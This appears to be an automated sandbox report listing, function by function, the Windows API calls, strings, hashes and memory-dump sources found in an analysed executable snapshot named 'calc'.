Opcode ID: 5b60db5229073f6f900d47f214ef1dac36a0b281dc4b7db597711eaa1891977d
Instruction ID: d3fe51862c2309d825a2603ef683ba1ebfbd6ccd36099a025a912eeaa0f8b8cd
Opcode Fuzzy Hash: 5b60db5229073f6f900d47f214ef1dac36a0b281dc4b7db597711eaa1891977d
Instruction Fuzzy Hash: AD01B532A4430ABBE7316AA4DC41F27BB98BF04744F100136BA84776D5E7F5EC154A98

Function 00415F9F Relevance: 7.6, APIs: 5, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(0042018E,00479E08,?,?,00420420,00479E08,00479E08,00000001,00000000,?,?,0042018E,?,00479E08), ref: 00415FD1
QueryPerformanceFrequency.KERNEL32(00000001,?,?,00420420,00479E08,00479E08,00000001,00000000,?,?,0042018E,?,00479E08), ref: 00415FDB
Sleep.KERNEL32(00000000,?,?,00420420,00479E08,00479E08,00000001,00000000,?,?,0042018E,?,00479E08), ref: 00415FE3
QueryPerformanceCounter.KERNEL32(00479E08,?,?,00420420,00479E08,00479E08,00000001,00000000,?,?,0042018E,?,00479E08), ref: 00415FED
Sleep.KERNEL32(000000FA,00479E08,?,?,00420420,00479E08,00479E08,00000001,00000000,?,?,0042018E,?,00479E08), ref: 0041602B

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 156a9a50ae8b932824767fb1cc352828150c381100d1d1f072abcc3b451083d3
Instruction ID: a0496099f4671258914814ba49d464bf0d8d7d2263f3373baa9b493c5c5e15e0
Opcode Fuzzy Hash: 156a9a50ae8b932824767fb1cc352828150c381100d1d1f072abcc3b451083d3
Instruction Fuzzy Hash: 20114C31D04A2EEBCF009BA4ED899EDBF78FB48706F01049AE441A2155DF38D5958759

Function 0041255C Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

DestroyCursor.USER32(?), ref: 00412572
DestroyCursor.USER32(?), ref: 0041257A
DestroyCursor.USER32(?), ref: 00412582
DestroyCursor.USER32(?), ref: 0041258C
DestroyCursor.USER32(?), ref: 00412597

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CursorDestroy
String ID:
API String ID: 1272848555-0
Opcode ID: d5352005860e989090d583af45c09cb90acb3b9687f189d7be541a4d722c1722
Instruction ID: 5af252f83c0998234af6a32d05166f9f1353af0f655894e23adab3b1f56daafc
Opcode Fuzzy Hash: d5352005860e989090d583af45c09cb90acb3b9687f189d7be541a4d722c1722
Instruction Fuzzy Hash: 27011671100B889EC761AF79DC40BCABBE4EF48304F114C2AE59EE21A1E7B56A24CF55

Function 0040E906 Relevance: 7.5, APIs: 5, Instructions: 39windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0040E917
GetWindowTextW.USER32(00000000,?,00000100), ref: 0040E92E
MessageBeep.USER32(00000000), ref: 0040E946
KillTimer.USER32(?,0000040A), ref: 0040E966
EndDialog.USER32(?,00000001), ref: 0040E981

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 2ac69c56fc93b93703b80b9b75d3b78a5ca045b25a7619f806470178b95d6f54
Instruction ID: eefd527a5873faa5c6ba46484e8b71b9a847f1d4d4b8dc00e6c15001e6f527b0
Opcode Fuzzy Hash: 2ac69c56fc93b93703b80b9b75d3b78a5ca045b25a7619f806470178b95d6f54
Instruction Fuzzy Hash: BB018670500709EBEB215B62ED4DF9677B8BB00706F04056AA282A10E1D7B5E895CB59

Function 0040D6BD Relevance: 7.5, APIs: 5, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(00000030,00000005), ref: 0040D6D5
SendMessageW.USER32(00000000,00000087,00000000,00000000), ref: 0040D6E9
GetWindow.USER32(00000000,00000002), ref: 0040D6F6
IsWindow.USER32(00000000), ref: 0040D6FB
GetDlgCtrlID.USER32(?), ref: 0040D70C

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Window$CtrlMessageSend
String ID:
API String ID: 75316347-0
Opcode ID: 0e3289aaeed3d6dad4732093dbf9fab04ae24d55cc092ac6ae943d18526d3546
Instruction ID: 64ae80fba0dfbd0f8e7b107c93965b29ce3a89bba25f913328f7fd94f1d7797f
Opcode Fuzzy Hash: 0e3289aaeed3d6dad4732093dbf9fab04ae24d55cc092ac6ae943d18526d3546
Instruction Fuzzy Hash: 50F0BE31B01715FBEA251BA0DC45FAA7B64FB08382F100132E208A21D1FB35DC208A9D

Function 0040CC87 Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0040CC99
StrokeAndFillPath.GDI32(?,?,0040C5B2,?,?,00000000,00000000,?,?,?,?,00000000,00000001), ref: 0040CCB1
StrokePath.GDI32(?), ref: 0040CCBC
SelectObject.GDI32(?,00000000), ref: 0040CCD2
DeleteObject.GDI32(00000000), ref: 0040CCE3

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 23c54d3cf4bc0d418e7e8bc42216f99ef4e3a97e6112289699dbe474492b5dfa
Instruction ID: faaffeaf7891965e631770e75f3ffb588c3777943424dd606cefa2ef2d9927aa
Opcode Fuzzy Hash: 23c54d3cf4bc0d418e7e8bc42216f99ef4e3a97e6112289699dbe474492b5dfa
Instruction Fuzzy Hash: 6C018B31004706EBEB214F28D8487D57B71AB40322F108625F96AA61F0CB3999A2CF54

Function 0040D03A Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

MoveToEx.GDI32(?,?,?,00000000), ref: 0040D047
LineTo.GDI32(?,?,?), ref: 0040D05A
LineTo.GDI32(?,?,?), ref: 0040D063
LineTo.GDI32(?,?,?), ref: 0040D06C
LineTo.GDI32(?,?,?), ref: 0040D075

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Line$Move
String ID:
API String ID: 3367123170-0
Opcode ID: 0106cda48ff9bbf4bdcf28e82eb6819dc74d54902d14879b2f11568f3fb45efe
Instruction ID: b97fa02212309c47107a525ebd6b8e18c6dd5977cae12453f45f519e06501ec8
Opcode Fuzzy Hash: 0106cda48ff9bbf4bdcf28e82eb6819dc74d54902d14879b2f11568f3fb45efe
Instruction Fuzzy Hash: DCF09B3640011CBBCF126FA1DC44EEF3F3AEB4AAA1F008419FA1855060C7369521FBA2

Function 004249D1 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 268comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00424A34
CoCreateInstance.COMBASE(0045AE98,00000000,00000001,0045AE88,?), ref: 00424A4B
CoUninitialize.COMBASE ref: 00424C9D

Strings

.lnk, xrefs: 00424A13, 00424A18, 00424A26

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: abe4dc049cf9ea11e79e1e6d9546ddabb46a3fdb4675210c504674f090cd1e24
Instruction ID: 247f32ee5b818feb01d68aeef06b919af8635f7b9c9483692209132b4a3e94cc
Opcode Fuzzy Hash: abe4dc049cf9ea11e79e1e6d9546ddabb46a3fdb4675210c504674f090cd1e24
Instruction Fuzzy Hash: E1A18035A00214EFDF10DF54D885A9EBBB5EF85324F55809AE805AB351C738EE81CF98

Function 00424CB5 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00424D37
CoCreateInstance.COMBASE(0045AE98,00000000,00000001,0045AE88,?), ref: 00424D4E
CoUninitialize.COMBASE ref: 00424EDC

Strings

.lnk, xrefs: 00424CEE, 00424CF3, 00424D01

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: f05d7367beeb5f65309bbd3b4249ca7ef7fbead5d0f8a486fa669403c51d8ec6
Instruction ID: 6601a6f92ded61f3dc518123d982e861e17d97c3953e59de5f2fbdd9491a0982
Opcode Fuzzy Hash: f05d7367beeb5f65309bbd3b4249ca7ef7fbead5d0f8a486fa669403c51d8ec6
Instruction Fuzzy Hash: CD619E71600218AFDB00EFA4DC85EEE7779EF88354F10454AF505AB291CA78EE81CB94

Function 0043903B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00439188
CloseHandle.KERNEL32(00000000,00000001), ref: 00439216

Strings

@, xrefs: 00439157
open, xrefs: 00439044

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CloseExecuteHandleShell
String ID: @$open
API String ID: 283469938-267353779
Opcode ID: eabc24713cc0d57b82beee37674fe870f9fd3a7856a74545b4a3a8b12b45cbae
Instruction ID: feda34889901b56425d67917506db13db688c050cc61e307db15a32002fab435
Opcode Fuzzy Hash: eabc24713cc0d57b82beee37674fe870f9fd3a7856a74545b4a3a8b12b45cbae
Instruction Fuzzy Hash: 7D61CF35800216EBEF14EF96C849A9EB7B4BF08324F14416BE81577251CBB8AD85CBD9

Function 004137E9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 175windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000000,000000FF,00000000,0000002C), ref: 004138ED
SetMenuItemInfoW.USER32(00000000,000000FF,00000000,0000002C), ref: 0041399F
SetMenuDefaultItem.USER32(00000000,000000FF,00000000), ref: 004139BA

Strings

,, xrefs: 004138C0

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ItemMenu$Info$Default
String ID: ,
API String ID: 1306138088-3772416878
Opcode ID: 71f438033b53904974136d9e04b45af9f2db5fb7443b03c49805bf458f58f483
Instruction ID: 0562580491547a8833eccc7864831183b09bff118f29a06cf6e1091235e7571e
Opcode Fuzzy Hash: 71f438033b53904974136d9e04b45af9f2db5fb7443b03c49805bf458f58f483
Instruction Fuzzy Hash: 1F5116B1A14248AAEB21DF65C4847DFBBF5AF40325F24845FE481A6281C7BD9FC4CB19

Function 004246CD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141fileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000), ref: 004247C7
DeleteFileW.KERNEL32(00000000), ref: 004247F1
FreeLibrary.KERNEL32(00000000,00000000), ref: 00424847

Strings

su, xrefs: 00424847

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: DeleteErrorFileFreeLastLibrary
String ID: su
API String ID: 2986937368-45427494
Opcode ID: de5ada64192f288c7d5951babf4f08a3a3b5f0c45b99619aa895fb4c60c3ae0f
Instruction ID: 7d4b9774e6ea4061bb3ea3b4dea8a86c92428497e7d989edbd8b32bd18d52442
Opcode Fuzzy Hash: de5ada64192f288c7d5951babf4f08a3a3b5f0c45b99619aa895fb4c60c3ae0f
Instruction Fuzzy Hash: 1951B379A00225EFDB00EF55E84099DF774FF81324B95855BE429A7601CB38FC81CB99

Function 0041352C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,00000001,00000000,0000002C), ref: 004135A0
DeleteMenu.USER32(?,?,00000000,?,00000001,00000000,0000002C), ref: 004135EB
DeleteMenu.USER32(?,00000001,00000000), ref: 00413642

Strings

,, xrefs: 00413583

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: ,
API String ID: 135850232-3772416878
Opcode ID: eadcb55df29078d9890b1672165eda3be909e78da1399042eef8c1ff167db386
Instruction ID: 3c634a933cfbc8d95b1f8b83f838f06eb693c9081707924d3606c629297d5029
Opcode Fuzzy Hash: eadcb55df29078d9890b1672165eda3be909e78da1399042eef8c1ff167db386
Instruction Fuzzy Hash: D441D231604244FFDB20CF68C984BD9BBF1AF05325F2485A9E955AB391C378EE81CB55

Function 0044C323 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0044C3A3
__lock.LIBCMT ref: 0044C3D4

Part of subcall function 00449C88: __lock.LIBCMT ref: 00449CA6
Part of subcall function 00449C88: RtlFreeHeap.NTDLL(00000000,?,0045B078,0000000C,0044C6BF,00000000,0045B3A0,00000008,0044C6F4,?,?,?,00449A5F,00000004,0045B068,0000000C), ref: 00449CED

Strings

hTF, xrefs: 0044C426
XF, xrefs: 0044C393

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: __lock$FreeHeap
String ID: hTF$XF
API String ID: 743385489-2767625525
Opcode ID: 15d3f2fcc540dc9ede1f981cb8dd8904e9aaebf2256775583c62ffcca9ea3c7b
Instruction ID: edb2aeb90118eac4e3f8c23d9c0d3922c22ecf043b2881719fa403f2a85e6d15
Opcode Fuzzy Hash: 15d3f2fcc540dc9ede1f981cb8dd8904e9aaebf2256775583c62ffcca9ea3c7b
Instruction Fuzzy Hash: EF31D731642A008FE7A0EF29D5C186AB3F5AF9471576C464FE410DB652CB3EDC819A1C

Function 004241EE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004241FB
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 00424299
FreeLibrary.KERNEL32(?), ref: 004242EF

Strings

su, xrefs: 004242EF

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Free$DiskErrorLibraryModeSpace
String ID: su
API String ID: 196386347-45427494
Opcode ID: d4525d0b894da0b7848a2574bfaea22d4a351bbcd6a5746c59c8fb9b4fbb3e78
Instruction ID: f274591ae7b67bffc816cfc9c90c776a87d96e347c749b2d83b5f8e98dcb1e87
Opcode Fuzzy Hash: d4525d0b894da0b7848a2574bfaea22d4a351bbcd6a5746c59c8fb9b4fbb3e78
Instruction Fuzzy Hash: 08316231A00518EBCF05EF96E8458EEBBB8FF84350B4540ABF501A7151DB38A945CB69

Function 004155D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00414E6E: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,0047BD30,?,0040FF5E,?,?), ref: 00414E89

lstrcmpiW.KERNEL32(?,?), ref: 0041560D
MoveFileW.KERNEL32(?,?), ref: 00415643

Part of subcall function 0041553B: GetFileAttributesW.KERNEL32(0041568E,?,?,?,0041568E,?), ref: 00415558
Part of subcall function 0041553B: GetLastError.KERNEL32(?,?,?,0041568E,?), ref: 00415563
Part of subcall function 0041553B: CreateDirectoryW.KERNEL32(0041568E,00000000,?,?,?,0041568E,?), ref: 00415577

SHFileOperationW.SHELL32(?), ref: 0041570F

Strings

\*.*, xrefs: 004156AA

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPathlstrcmpi
String ID: \*.*
API String ID: 1621038701-1173974218
Opcode ID: ed6c6db5e1a82ec21dce6ba2fede384b792a7cb1beee2ae600bde39d4fb8793d
Instruction ID: 5b62e6b32fe5bc9b2134debb3df8c4339f2b18e98be065067f761ca7b62991fe
Opcode Fuzzy Hash: ed6c6db5e1a82ec21dce6ba2fede384b792a7cb1beee2ae600bde39d4fb8793d
Instruction Fuzzy Hash: D131F07180131DAADF50EFE5D845ADEB7BCAF49314F9044ABE508E3141E7389B898F58

Function 0042026C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,00420227,@ExitCode,0047A0C0,0045C6D0,00479E08,00479E08,?,?,00478410,?,00479E08,00479E08,00000000), ref: 004202DF
CharUpperBuffW.USER32(?,00420227,@ExitMethod,0047BD20,?,00000000,?,?,00478410,?,00479E08,00479E08,00000000), ref: 0042031E

Part of subcall function 004183F6: VariantClear.OLEAUT32(?), ref: 00418410

Strings

@ExitCode, xrefs: 004202C6
@ExitMethod, xrefs: 0042030B

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
